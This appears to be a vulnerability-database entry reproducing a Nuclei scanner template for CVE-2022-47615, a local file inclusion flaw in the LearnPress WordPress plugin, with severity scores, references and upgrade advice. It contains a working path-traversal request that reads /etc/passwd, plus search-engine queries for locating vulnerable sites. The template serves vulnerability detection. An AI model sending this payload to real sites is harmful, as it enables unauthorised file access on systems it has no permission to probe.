Lucene search
ProjectDiscoveryNUCLEI:CVE-2022-47615HistoryAug 23, 2023 - 5:32 p.m.
LearnPress Plugin < 4.2.0 - Local File Inclusion
2023-08-2317:32:09
ProjectDiscovery
github.com
23
cve
cve2022
wp-plugin
wordpress
learnpress
lfi
thimpress
vulnerability
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.5 High
AI Score
Confidence
High
0.021 Low
EPSS
Percentile
89.1%
Local File Inclusion vulnerability in LearnPress – WordPress LMS Plugin <= 4.1.7.3.2 versions.
id: CVE-2022-47615
info:
name: LearnPress Plugin < 4.2.0 - Local File Inclusion
author: DhiyaneshDK
severity: critical
description: |
Local File Inclusion vulnerability in LearnPress – WordPress LMS Plugin <= 4.1.7.3.2 versions.
impact: |
Successful exploitation of this vulnerability could lead to unauthorized access to sensitive files, remote code execution, or information disclosure.
remediation: |
Upgrade to the latest version of LearnPress Plugin (4.2.0 or higher) to mitigate this vulnerability.
reference:
- https://github.com/RandomRobbieBF/CVE-2022-47615/tree/main
- https://nvd.nist.gov/vuln/detail/CVE-2022-47615
- https://patchstack.com/database/vulnerability/learnpress/wordpress-learnpress-plugin-4-1-7-3-2-local-file-inclusion?_s_id=cve
- https://github.com/RandomRobbieBF/CVE-2022-47615
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-47615
cwe-id: CWE-434
epss-score: 0.01795
epss-percentile: 0.88096
cpe: cpe:2.3:a:thimpress:learnpress:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: thimpress
product: learnpress
framework: wordpress
shodan-query: http.html:/wp-content/plugins/learnpress
fofa-query: body=/wp-content/plugins/learnpress
publicwww-query: "/wp-content/plugins/learnpress"
tags: cve,cve2022,wp-plugin,wp,wordpress,learnpress,lfi,thimpress
http:
- raw:
- |
GET /wp-json/lp/v1/courses/archive-course?template_path=..%2F..%2F..%2Fetc%2Fpasswd&return_type=html HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: word
part: body
words:
- '"status":'
- '"pagination":'
condition: and
- type: word
part: header
words:
- "application/json"
- type: status
status:
- 200
# digest: 4b0a004830460221009558c7ec3e1a55dd6049c8cbe33690c2ae36e63876db181f7d6838993d8df925022100cd6c1d53f5ce281c93ad0c3b25e6a08aac9f5f281369fae8fccd51f4fddf2e2c:922c64590222798bb761d5b6d8e72950Related
cve
cve
CVE-2022-47615
2023-01-26 21:18:03
wpvulndb
wpvulndb
LearnPress Plugin < 4.2.0 - Unauthenticated LFI
2023-01-24 00:00:00
prion
prion
Remote file inclusion
2023-01-26 21:18:00
cvelist
cvelist
nvd
nvd
CVE-2022-47615
2023-01-26 21:18:03
githubexploit
githubexploit
openvas
openvas
WordPress LearnPress Plugin <= 4.1.7.3.2 Multiple Vulnerabilities
2023-01-26 00:00:00
malwarebytes
malwarebytes
Update your LearnPress plugins now!
2023-01-30 12:15:00
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.5 High
AI Score
Confidence
High
0.021 Low
EPSS
Percentile
89.1%
Related for NUCLEI:CVE-2022-47615